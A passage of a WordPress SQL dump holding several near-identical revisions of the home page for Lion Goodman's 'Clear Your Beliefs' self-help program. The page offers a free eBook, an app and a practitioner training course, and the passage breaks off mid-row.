(1752, 2, '2014-11-14 02:22:59', '2014-11-14 07:22:59', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:22:59', '2014-11-14 07:22:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1753, 2, '2014-11-14 02:24:31', '2014-11-14 07:24:31', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:24:31', '2014-11-14 07:24:31', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1754, 2, '2014-11-14 02:28:46', '2014-11-14 07:28:46', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:28:46', '2014-11-14 07:28:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1755, 2, '2014-11-14 02:31:01', '2014-11-14 07:31:01', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\n<p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p></p> <p> </p>Complete Program\n<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:31:01', '2014-11-14 07:31:01', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1756, 2, '2014-11-14 02:33:07', '2014-11-14 07:33:07', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\n<p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p>  </p>Complete Program\n&lt;img style=&quot;top:-10px !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png&quot;\n<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:33:07', '2014-11-14 07:33:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1757, 2, '2014-11-14 02:39:48', '2014-11-14 07:39:48', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\n<p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p>  </p>Complete Program&lt;img style=&quot;top:-10px !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png&quot;<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:39:48', '2014-11-14 07:39:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1758, 2, '2014-11-14 02:41:55', '2014-11-14 07:41:55', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\n<p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p>  </p>Complete Program\n&lt;img style=&quot;margin-top:-10px !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png&quot;\n<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, 